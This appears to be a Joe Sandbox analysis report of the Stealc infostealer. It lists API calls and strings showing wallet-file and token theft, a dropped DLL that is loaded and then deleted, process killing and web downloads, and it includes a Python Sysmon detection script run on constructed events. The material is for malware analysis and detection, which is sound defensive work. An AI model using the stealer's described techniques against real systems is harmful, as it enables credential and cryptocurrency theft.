                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuetask
                                        • String ID: Password
                                        • API String ID: 775622407-3434357891
                                        • Opcode ID: 237a9ddcde40478f44dc94651e903f88315ee9bd6155a528fa03d256b1e00125
                                        • Instruction ID: 2163b3246f23237e4f57d270fd2e87f4241e6990d25db304d4b094b2c27d89d3
                                        • Opcode Fuzzy Hash: 237a9ddcde40478f44dc94651e903f88315ee9bd6155a528fa03d256b1e00125
                                        • Instruction Fuzzy Hash: 7061E9B5D0416CDBDB24DB50CC55BDAB7B8BF48300F0081E9E649A6145EB74ABC9CFA1
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                        • lstrlen.KERNEL32(00000000), ref: 007BBC6F
                                          • Part of subcall function 007C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007C8FE2
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 007BBC9D
                                        • lstrlen.KERNEL32(00000000), ref: 007BBD75
                                        • lstrlen.KERNEL32(00000000), ref: 007BBD89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 05bb3ea84f2b4098a1fd549832268036b67c5af1be9d18c7ef85ec7a8d3356c0
                                        • Instruction ID: 1f23743252f38823dfb0c5d25a25d8f3793a01cb5a87dec894698bdcdbf24038
                                        • Opcode Fuzzy Hash: 05bb3ea84f2b4098a1fd549832268036b67c5af1be9d18c7ef85ec7a8d3356c0
                                        • Instruction Fuzzy Hash: 74B11FB191010CEBCB14EBA0DDAAFEE7339AF54309F50455DF50662191EF786E48CB62
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: ba2bc93435f575592b839c8a7eafb8f1ff9c4e53d12093fbf52eaa60d33604e4
                                        • Instruction ID: ed27f83fbf4a1f0e3f0eba9a7266be4d5678985f4b4119747ea83bdc0c941bc6
                                        • Opcode Fuzzy Hash: ba2bc93435f575592b839c8a7eafb8f1ff9c4e53d12093fbf52eaa60d33604e4
                                        • Instruction Fuzzy Hash: 1DF08C3090C209EFD344EFE0EC8DF9CBB30EB04707F218299F609965A0DA748A81DB61
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007C9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,007C08DC,C:\ProgramData\chrome.dll), ref: 007C9871
                                          • Part of subcall function 007BA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007BA098
                                        • StrCmpCA.SHLWAPI(00000000,01658A28), ref: 007C0922
                                        • StrCmpCA.SHLWAPI(00000000,01658978), ref: 007C0B79
                                        • StrCmpCA.SHLWAPI(00000000,016589B8), ref: 007C0A0C
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                        • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007C0C35
                                        Strings
                                        • C:\ProgramData\chrome.dll, xrefs: 007C08CD
                                        • C:\ProgramData\chrome.dll, xrefs: 007C0C30
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                        • API String ID: 585553867-663540502
                                        • Opcode ID: cf4d2eba8fd130e9aec2298282c4a34f6efe1f17fedbf59718e85323b5b58d57
                                        • Instruction ID: 6ab25159ef968cb8ff814551e924bb6a7f29092b92564a572fac3788fb107c9e
                                        • Opcode Fuzzy Hash: cf4d2eba8fd130e9aec2298282c4a34f6efe1f17fedbf59718e85323b5b58d57
                                        • Instruction Fuzzy Hash: 85A12371700208EFCB28EF64DA96FED7776AF94304F50816DE80A9F251DA34DA05CB96
                                        APIs
                                          • Part of subcall function 007C8CF0: GetSystemTime.KERNEL32(007D0E1B,0165E2E8,007D05B6,?,?,007B13F9,?,0000001A,007D0E1B,00000000,?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007C8D16
                                        • wsprintfA.USER32 ref: 007B9E7F
                                        • lstrcat.KERNEL32(00000000,?), ref: 007B9F03
                                        • lstrcat.KERNEL32(00000000,?), ref: 007B9F17
                                        • lstrcat.KERNEL32(00000000,007D12D8), ref: 007B9F29
                                        • lstrcpy.KERNEL32(?,00000000), ref: 007B9F7C
                                        • Sleep.KERNEL32(00001388), ref: 007BA013
                                          • Part of subcall function 007C99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C99C5
                                          • Part of subcall function 007C99A0: Process32First.KERNEL32(007BA056,00000128), ref: 007C99D9
                                          • Part of subcall function 007C99A0: Process32Next.KERNEL32(007BA056,00000128), ref: 007C99F2
                                          • Part of subcall function 007C99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 007C9A4E
                                          • Part of subcall function 007C99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 007C9A6C
                                          • Part of subcall function 007C99A0: CloseHandle.KERNEL32(00000000), ref: 007C9A79
                                          • Part of subcall function 007C99A0: CloseHandle.KERNEL32(007BA056), ref: 007C9A88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                        • String ID: D
                                        • API String ID: 531068710-2746444292
                                        • Opcode ID: 139f328d2157da79605ea8a9e44b872ca40324db633154c0baf398586234ec9a
                                        • Instruction ID: aa20a7cd89466831e36db2309c37c8acca357a50c04e661a3df333867b3574b7
                                        • Opcode Fuzzy Hash: 139f328d2157da79605ea8a9e44b872ca40324db633154c0baf398586234ec9a
                                        • Instruction Fuzzy Hash: 535165B1944318EBEB24DB60DC8EFDA7778AF44700F14459CB60DAB281EA75AB84CF51
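The two function listings above map directly onto host telemetry: the subcalls at 007C9871 / 007BA098 / 007C0C35 create, LoadLibrary and then delete C:\ProgramData\chrome.dll, and the loop at 007C99A0 snapshots the process list and calls OpenProcess(00000001, ...) followed by TerminateProcess, i.e. it asks for exactly PROCESS_TERMINATE. The following example was written for this page and is not part of the Joe Sandbox report; it correlates Sysmon-style events (EventID 11 FileCreate, 7 ImageLoad, 23 FileDelete, 10 ProcessAccess) into those two patterns. All events are constructed, the GUIDs, timestamps and image paths are placeholders, and the 60 s window and three-target threshold are tuning assumptions, not values from the report.

```python
"""Correlate Sysmon-style events for two behaviours seen in the Stealc listings:
(1) one process writes C:\\ProgramData\\chrome.dll, maps it with LoadLibrary and
deletes it again; (2) the same process opens other processes with GrantedAccess
exactly 0x1 (PROCESS_TERMINATE) and kills them. Example code, not part of the
sandbox report. Field names follow Sysmon; the events themselves are CONSTRUCTED."""
from collections import defaultdict
from datetime import datetime, timedelta

PROCESS_TERMINATE = 0x1                       # OpenProcess(00000001, ...) in the listing
DROP_PATH = r"c:\programdata\chrome.dll"      # compared case-insensitively
KILL_THRESHOLD = 3                            # distinct targets opened for termination (assumption)
WINDOW = timedelta(seconds=60)                # correlation window (assumption)

FILE_EXE = r"C:\Users\user\Desktop\file.exe"  # placeholder image path
SAMPLE_EVENTS = [  # constructed for this example
    {"EventID": 11, "UtcTime": "2024-10-29 10:00:00", "ProcessGuid": "{A}", "Image": FILE_EXE,
     "TargetFilename": r"C:\ProgramData\chrome.dll"},
    {"EventID": 7, "UtcTime": "2024-10-29 10:00:01", "ProcessGuid": "{A}", "Image": FILE_EXE,
     "ImageLoaded": r"C:\ProgramData\chrome.dll"},
    {"EventID": 10, "UtcTime": "2024-10-29 10:00:02", "SourceProcessGuid": "{A}", "SourceImage": FILE_EXE,
     "TargetImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "GrantedAccess": "0x1"},
    {"EventID": 10, "UtcTime": "2024-10-29 10:00:03", "SourceProcessGuid": "{A}", "SourceImage": FILE_EXE,
     "TargetImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", "GrantedAccess": "0x1"},
    {"EventID": 10, "UtcTime": "2024-10-29 10:00:04", "SourceProcessGuid": "{A}", "SourceImage": FILE_EXE,
     "TargetImage": r"C:\Program Files\Mozilla Firefox\firefox.exe", "GrantedAccess": "0x1"},
    {"EventID": 10, "UtcTime": "2024-10-29 10:00:05", "SourceProcessGuid": "{A}", "SourceImage": FILE_EXE,
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},  # query-only, ignored
    {"EventID": 23, "UtcTime": "2024-10-29 10:00:10", "ProcessGuid": "{A}", "Image": FILE_EXE,
     "TargetFilename": r"C:\ProgramData\chrome.dll"},
    # benign noise: explorer loads a system DLL; svchost writes the path but never loads it
    {"EventID": 7, "UtcTime": "2024-10-29 10:00:06", "ProcessGuid": "{B}", "Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
    {"EventID": 11, "UtcTime": "2024-10-29 10:00:07", "ProcessGuid": "{C}", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\ProgramData\chrome.dll"},
]

def _ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S")

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def find_drop_load_delete(events, path=DROP_PATH):
    """Per process: FileCreate, then ImageLoad, then FileDelete of `path`, in that order."""
    by_proc = defaultdict(list)
    for e in events:
        target = e.get("TargetFilename") or e.get("ImageLoaded") or ""
        if e["EventID"] in (11, 7, 23) and target.lower() == path:
            by_proc[e["ProcessGuid"]].append(e)
    hits = []
    for guid, evs in by_proc.items():
        evs.sort(key=_ts)
        want, i = [11, 7, 23], 0                  # advance through the expected order
        for e in evs:
            if i < len(want) and e["EventID"] == want[i]:
                i += 1
        if i == len(want):
            hits.append({"rule": "drop_load_delete", "ProcessGuid": guid, "Image": evs[0]["Image"],
                         "path": path, "first": evs[0]["UtcTime"], "last": evs[-1]["UtcTime"]})
    return hits

def find_terminate_sweep(events, threshold=KILL_THRESHOLD, window=WINDOW):
    """Per source process: >= threshold distinct targets opened with GrantedAccess == 0x1 inside `window`."""
    by_src = defaultdict(list)
    for e in events:
        if e["EventID"] == 10 and int(e["GrantedAccess"], 16) == PROCESS_TERMINATE:
            by_src[e["SourceProcessGuid"]].append(e)
    hits = []
    for guid, evs in by_src.items():
        evs.sort(key=_ts)
        start = 0
        for end in range(len(evs)):               # sliding window over the sorted opens
            while _ts(evs[end]) - _ts(evs[start]) > window:
                start += 1
            targets = {_basename(e["TargetImage"]) for e in evs[start:end + 1]}
            if len(targets) >= threshold:
                hits.append({"rule": "terminate_sweep", "ProcessGuid": guid,
                             "Image": evs[start]["SourceImage"], "targets": sorted(targets)})
                break
    return hits

def run(events=SAMPLE_EVENTS):
    return find_drop_load_delete(events) + find_terminate_sweep(events)

if __name__ == "__main__":
    for hit in run():
        print(hit)
```

A legitimate program that opens another process almost always asks for query rights as well, so an access mask of exactly 0x1 is already a strong signal; requiring several distinct targets inside a short window keeps one stray open from firing. Both EventID 10 (ProcessAccess) and EventID 23 (FileDelete) have to be enabled in the Sysmon configuration, and FileDelete only records the deletion, so the load has to be caught by ImageLoad while the file still exists.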
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 0082FA1F
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0082FA27
                                        • _ValidateLocalCookies.LIBCMT ref: 0082FAB0
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0082FADB
                                        • _ValidateLocalCookies.LIBCMT ref: 0082FB30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction ID: 0afe921ff121cabfca135c3fa392cb3aa93b5eade3b36d902992e73bf19ca820
                                        • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction Fuzzy Hash: D3419330A00229EBCF10DF68D894A9E7BB5FF49324F148175EA19EB392D7319945CF91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007B501A
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007B5021
                                        • InternetOpenA.WININET(007D0DE3,00000000,00000000,00000000,00000000), ref: 007B503A
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 007B5061
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 007B5091
                                        • InternetCloseHandle.WININET(?), ref: 007B5109
                                        • InternetCloseHandle.WININET(?), ref: 007B5116
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: fc50f92cc2ae86aed2b9117b3d46813b4a58c13fea0160cde72acf863bbc7ff6
                                        • Instruction ID: 29b637f2edd2d93acb9356d999249d36d34b3e1f89bb7d38238b94ffb9d7dcd9
                                        • Opcode Fuzzy Hash: fc50f92cc2ae86aed2b9117b3d46813b4a58c13fea0160cde72acf863bbc7ff6
                                        • Instruction Fuzzy Hash: E6311AB4A0421CABDB20DF94CC89BDCB7B4AB48304F2081D9F709A7281D7746EC58F98
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007C85B6
                                        • wsprintfA.USER32 ref: 007C85E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 007C860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C8629
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                        • RegQueryValueExA.ADVAPI32(00000000,0165E940,00000000,000F003F,?,00000400), ref: 007C867C
                                        • lstrlen.KERNEL32(?), ref: 007C8691
                                        • RegQueryValueExA.ADVAPI32(00000000,0165E8C8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,007D0B3C), ref: 007C8729
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C8798
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C87AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: 7b8937d221ce31c9622236a4ff6e4a4bb1e4831e89a40fe473538bad5cbedac3
                                        • Instruction ID: 2d60d44bc24ce4818e95760a5fa4344426fd4dae977da0faf2c99fbb8a370676
                                        • Opcode Fuzzy Hash: 7b8937d221ce31c9622236a4ff6e4a4bb1e4831e89a40fe473538bad5cbedac3
                                        • Instruction Fuzzy Hash: A3211971A1021CABDB64DB94DC85FE9B3B8FB48704F10C1DCA609A6180DF74AA85CFE4
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C99C5
                                        • Process32First.KERNEL32(007BA056,00000128), ref: 007C99D9
                                        • Process32Next.KERNEL32(007BA056,00000128), ref: 007C99F2
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007C9A4E
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 007C9A6C
                                        • CloseHandle.KERNEL32(00000000), ref: 007C9A79
                                        • CloseHandle.KERNEL32(007BA056), ref: 007C9A88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
